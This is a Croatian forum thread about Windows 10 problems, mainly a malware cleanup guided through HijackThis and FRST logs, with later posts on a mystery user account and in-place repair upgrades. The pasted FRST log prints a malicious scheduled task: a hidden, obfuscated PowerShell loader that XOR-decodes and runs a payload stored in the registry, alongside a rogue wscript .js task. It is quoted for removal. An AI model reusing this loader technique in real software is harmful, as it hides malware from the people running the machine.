PC Ekspert Forum - Windows 10 - problemi, troubleshooting

PC Ekspert Forum (https://forum.pcekspert.com/index.php)

- Operativni sustavi (https://forum.pcekspert.com/forumdisplay.php?f=36)

- - Windows 10 - problemi, troubleshooting (https://forum.pcekspert.com/showthread.php?t=272277)

Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj:

Code:

try {

        if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };

        if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };

}

catch { return $false }

return $true



# i na kraju



powershell Set-ExecutionPolicy -ExecutionPolicy Restricted

Citiraj:

Autor domy_os (Post 3687397)

Code:

try {

        if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };

        if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };

}

catch { return $false }

return $true



# i na kraju



powershell Set-ExecutionPolicy -ExecutionPolicy Restricted

Ukucao ovo u powershell i vratio mi je false

Citiraj:

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:16:50, on 24.7.2023.
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.19041.1566)

Boot mode: Normal

Running processes:
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Users\Boris\Desktop\HijackThis.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{d7fde4bf-e111-4e9b-a6c9-d207412f0933}: NameServer = 213.191.128.8,213.191.128.9
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Inc. - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Genuine Software Monitor Service (AGMService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service: eID DCS (AkdEidDcs) - Unknown owner - C:\Program Files\AKD\eID Middleware\Dcs.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: AMD Crash Defender Service - Unknown owner - C:\WINDOWS\System32\amdfendrsr.exe (file missing)
O23 - Service: AMD External Events Utility - AMD - C:\WINDOWS\System32\DriverStore\FileRepository\u0379219.inf_amd64_3649648678001de4\B378972\atiesrxx.exe
O23 - Service: AnyDesk Service (AnyDesk) - AnyDesk Software GmbH - C:\Program Files (x86)\AnyDesk\AnyDesk.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.00.42\atkexComSvc.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_63b49 - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: Dropbox Update Service (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox Update Service (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: DbxSvc - Unknown owner - C:\WINDOWS\system32\DbxSvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: EG Station Information Service - Unknown owner - C:\Esko\bg_prog_egsis_v010\bin_ix86\egsissrv.exe
O23 - Service: Esko Subscription Service - Esko BVBA - C:\Program Files (x86)\Common Files\Esko\SubscriptionService\SubscriptionService\SubscriptionService.exe
O23 - Service: Everything - voidtools - C:\Program Files\Everything\Everything.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FLEXlm License Manager - Flexera - C:\Esko\bg_prog_system_v010\bin_ix86\lmgrd.exe
O23 - Service: FlexNet Licensing Service - Flexera - C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
O23 - Service: FlexNet Licensing Service 64 - Flexera - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Google Chrome Elevation Service (GoogleChromeElevationService) (GoogleChromeElevationService) - Google LLC - C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.199\elevation_service.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) PROSet Monitoring Service - Unknown owner - C:\Windows\system32\IProsetMonitor.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @oem127.inf,%SERVICE_FRIENDLY_NAME%;Nahimic service (NahimicService) - Unknown owner - C:\WINDOWS\system32\NahimicService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: Corel License Validation Service V2, Powered by arvato (PSI_SVC_2) - arvato digital services llc - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: Realtek Audio Universal Service (RtkAudioUniversalService) - Unknown owner - C:\WINDOWS\System32\RtkAudUService64.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Samsung UPD Utility Service (SamsungUPDUtilSvc) - Unknown owner - C:\Windows\SysWOW64\SecUPDUtilSvc.exe
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\WINDOWS\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\SgrmBroker.exe,-100 (SgrmBroker) - Unknown owner - C:\WINDOWS\system32\SgrmBroker.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\WINDOWS\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: @oem126.inf,%ss_conn_launcher.SvcDesc%;SAMSUNG Mobile USB Connectivity Launcher (ss_conn_launcher_service) - Unknown owner - C:\WINDOWS\System32\Samsung\EasySetup\ss_conn_launcher.exe (file missing)
O23 - Service: SAMSUNG Mobile Connectivity Service (ss_conn_service) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
O23 - Service: SAMSUNG Mobile Connectivity Service V2 (ss_conn_service2) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\28_ssconn2\conn\ss_conn_service2.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: Adobe SwitchBoard (SwitchBoard) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: VirtualBox system service (VBoxSDS) - Oracle Corporation - C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wacom Professional Service (WTabletServicePro) - Wacom Co. Ltd. - C:\Program Files\Tablet\Wacom\WTabletServicePro.exe

--
End of file - 10226 bytes

Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:

New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

U HJT logu ne vidim nešto sumnjivo, ali stavi logove i od FRST-a...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.

Što znače zelene kvačice na ikonama na desktopu?

https://i.ibb.co/vYf7xrR/kvacice-PCE.jpg

Fajlovi/šortkati su syncani s Onedrive-om (ili nekim drugim cloudom/NAS-on - Dropbox, Synology...).

Citiraj:

Autor domy_os (Post 3687787)

Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:

New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

Citiraj:

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )

Znaci sve sam izguglao ali neznam uz cega je ovo vezano

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN

Ja bih ovo maknuo:

Code:

Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)

 

Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION



Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN

A ovo disableao pa enableaj ako bude problema sa zvukom:

Code:

Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)



Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)

Decki eset poceo blokat link na ovu temu. Javlja neki trojan. Pretpostavljam da je do svih ovih kodova gore pa se blesira :stoopid:

Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.

Citiraj:

Autor spiderhr (Post 3721200)

Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.

A kako bi ga ti htio otvoriti?

Snagom misli?

Citiraj:

Autor kopija (Post 3721204)

A kako bi ga ti htio otvoriti?

Snagom misli?

Kak je bilo prije. Ikona u taskbaru otvorio se pa si na istu ikonu mogao otvoriti drugi, treći...

Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način.

Citiraj:

Autor spiderhr (Post 3721205)

Kak je bilo prije. Ikona u taskbaru otvorio se pa si na istu ikonu mogao otvoriti drugi, treći...

Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način.

Tipka za win + e ti ne otvara novi? Ili mišem middle click na ikonu u taskbaru?

Sent from my motorola edge 40 using Tapatalk

Meh... previše klikova plus kaj moram micati ruku s miša. Ovo sa win + e otvara.

Ma samo sam htio da ako već imam shortcutove u tasbaru da ih mogu višestruko otvoriti mišem. Jbg, razmazio me Linux a i do W7 je bilo sve normalno dok nisu počeli bijesne gliste izvoditi sa sučeljem kao to je bolje.

Edit: malo gunđam na Win. Bolje na Win nego na kolegice i kolege.

Middle click na ikonu na taskbaru bi morao otvoriti još jedan prozor, koja god aplikacija da je u pitanju (samo da dopušta više instanci).

Ekipa, iz čista mira mi se pojavio "user1" na Windowsima.
Znači sinoć sve bilo normalno, ugasim komp, odem leć, danas ga upalim i dočeka me onaj login izbornik da odaberem s kojim userom ću se logirati u Win, moj defaultni ili taj user1.
Ako kliknem na user1, pita me password. Wtf.

Uđem u svoj i u settingsima pod users vidim ovo:

https://i.postimg.cc/64pbkKxL/Image-007.png

Da li je moguće da je neki win update napravio tog usera?

EDIT:
Morao ući u safe mode, cmd run as admin, "net user user1 /del" da bi izbrisao taj account.
Nakon toga normalni boot u win, pa opet run netplwiz, i maknit kvačicu sa "users must enter username and password to log in to this computer", jer me bez toga svejedno zaustavljao na login screenu nakon boota.

Bravo Microsoft, bravo.

Malo je sumnjivo da su windowsi napravili taj account.

Ekipa, zna li netko kako se zove, i kako se dođe do one opcije u kojoj refreshash Windowse bez da gubiš instalirane appse ili podatke?

Prije dosta vremena naletio sam na čudan problem na jednom kompu - nisi mogao koristiti neke Win appove ili ući u postavke, kad bi to probao slika bi flashala, i pokrenuti app/postavka bi se automatski zatvorio, jednosatvno nisi ništa mogao s njima.

Sjećam se da sam tada to riješio svojevrsnim "refreshom" windowsa (ili možda čak user accounta?), a sad se nikako ne mogu sjetiti kako se ta opcija zove nit kako doći do nje? Zna li netko o čemu pričam?

Znači nije onaj klasični win refresh u kojem gubiš fileove ili aplikacije, ovdje ne gubiš ništa.

Citiraj:

Autor Roberto (Post 3752314)

Ili napraviš upgrade win na win. Dakle samo reinstaliraš win preko win sa označenim opcijama koje si naveo ili ideš na reset PC i napraviš isto tj resetiraš PC ali sa uključenim opcijama da ti ne dira programe i postavke.
Razlika je što za upgrade skidaš ISO, a reset se reinstalira iz samih win (component store ili otkuda već).

Možda za početak da si probaš i otvoriti CMD as admin i unutra prvo upisati:
DISM /Online /Cleanup-Image /RestoreHealth

Kada to odradi, onda još:
sfc /scannow

Nako toga restartaj win i vidi da li je pomoglo.

Neke probleme ti neće riješiti niti upgrade/reset.

Samo searchaj "Reset this PC", ili u Settings -> System -> Recovery, bar je tak na Win11

Mislim da Reset PC isto skida ISO i zapravo dela in-place upgrade

Nakon cca3 sata srčanja, nađoh da je ono što tražim i što sam tad napravio, spomenuti in place upgrade :D

Isti se, koliko sam vidio, ne može pokrenuti reset PC / recovery opcije, već skinut iso i pokrenut ga i napravit upgrade preko postojeće instalacije.

@Disco, probao bio zadnji put DISM, SFC, i hrpu drugih sličnih popravaka, sve što sam mogao izguglati na tu temu, probao sam. Na kraju me in place upgrade spasio potpune reinstalacije.

Šteta što nemam vremena istraživat zbog čega je do ovog došlo i ima li još jednostavnijeg i bržeg načina da se to riješi. Znači doslovce kad se pokrene preinstalled win app, ili pokuša otvoriti settings, ili nešto iz control panela, ekran krene u flickering i jedino što možeš je zatvoriti okvir pokretanja settingsa ili appa koji stoji smrznut. Ako to probaš ponovno napraviti, onda se app odmah sam zatvori.

Drugi put nailazim na taj problem.

Citiraj:

Autor Mario92 (Post 3752376)

Samo searchaj "Reset this PC", ili u Settings -> System -> Recovery, bar je tak na Win11

Mislim da Reset PC isto skida ISO i zapravo dela in-place upgrade

Biraš kod reseta hoćeš li skidat sa neta ili sa diska.

Imam slučaj gadno skršenih Win10 nakon Win Updatea.
Komp bi se nakon nadogradnje pokrenuo i čim bi učitao desktop - black screen. Nije dao uć u safe mode, ništa ni u RE, nije htio ni system restore pokrenut.

Onda sam ga uspio zavarat na način da sam stavio NVIDIA grafu u komp (komp ima MAD proc s integriranim GPU-om, i nakon toga sam uspio ući u windowse u safe modeu, od tamo doduše nikako nisam uspijevao maknut problematični zadnji update, al isam uspio pokrenuti system restore, no nakon vraćanja na stariju točku, kod pokretanja Windowsa dobijem BSOD s porukom "Critical process died".

I nakon toga, bilo s integriranom bilo s drugom grafom, ne mogu više ni u safe mode, baca samo tu grešku svaki put.

Jedino u što mogu uć je RE, a od tamo na otklanjanju poteškoća:
- popravak pri pokretanju - 0 bodova, neće
- postavke pokretanja - isto ništa, ne mogu ni u safe mode ni išta drugo što nudi
- deinstalacija ažuriranja, isto ništa, svaki put grešku javi
- vraćanje sustava - tu mi ponudi neke točke za oporavak, ali ovaj put kod odabira točke za vraćanje sustava mi kaže: "morate omogućiti zaštitu sustava na ovom pogonu"
-CMD na RE: tu sam probao DISM i SFC naredbe, ali ništa od toga mi nije uspjelo, također neke greške izbacuje.

